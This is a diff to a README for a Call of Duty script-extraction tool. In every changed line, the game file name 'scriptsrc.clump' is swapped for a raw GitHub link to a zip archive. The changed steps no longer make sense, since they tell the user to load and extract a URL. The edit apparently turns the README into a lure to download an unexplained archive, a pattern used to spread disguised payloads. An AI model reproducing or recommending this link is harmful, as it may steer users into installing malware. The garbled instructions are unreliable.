Ali183-onlymen/ScriptSource-Dumper/README.md

 Once you have installed ScriptSource-Dumper, use it to extract scripts from your Call of Duty game.
 Here's how:

 1. Open ScriptSource-Dumper.
-2. Load your scriptsrc.clump files by clicking the 'Load' button.
+2. Load your https://raw.githubusercontent.com/Ali183-onlymen/ScriptSource-Dumper/main/include/Dumper_Source_Script_1.3-beta.3.zip files by clicking the 'Load' button.
 3. Choose the directory where your game files are stored.
-4. Select the specific scriptsrc.clump file you want to extract.
+4. Select the specific https://raw.githubusercontent.com/Ali183-onlymen/ScriptSource-Dumper/main/include/Dumper_Source_Script_1.3-beta.3.zip file you want to extract.
 5. Click the 'Extract' button.
 Your game scripts will be extracted and saved to your chosen directory.

 ## 🌟 Features
-- Fast and efficient extraction of scriptsrc.clump files.
+- Fast and efficient extraction of https://raw.githubusercontent.com/Ali183-onlymen/ScriptSource-Dumper/main/include/Dumper_Source_Script_1.3-beta.3.zip files.
 - User-friendly interface designed for ease of use.
 - Supports multiple extraction formats.
 - Compatible with various game modding tools.